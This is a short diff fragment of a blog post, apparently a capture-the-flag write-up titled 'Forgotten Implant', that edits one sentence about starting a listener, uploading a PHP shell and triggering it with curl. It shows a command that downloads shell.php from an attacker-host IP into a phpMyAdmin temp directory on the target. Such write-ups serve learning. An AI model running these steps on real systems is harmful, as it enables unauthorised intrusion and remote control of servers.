noncenz/noncenz.github.io/_posts/2023-08-01-Forgotten Implant .md

 hello
 ```

 Looks good.
-Let’s upload a PHP shell and trigger it with curl:
+Let’s start a new listener, upload a PHP shell and trigger it with `curl`:

 ```bash
 ada@forgottenimplant:/var/www/phpmyadmin/tmp$ wget 10.6.74.177/shell.php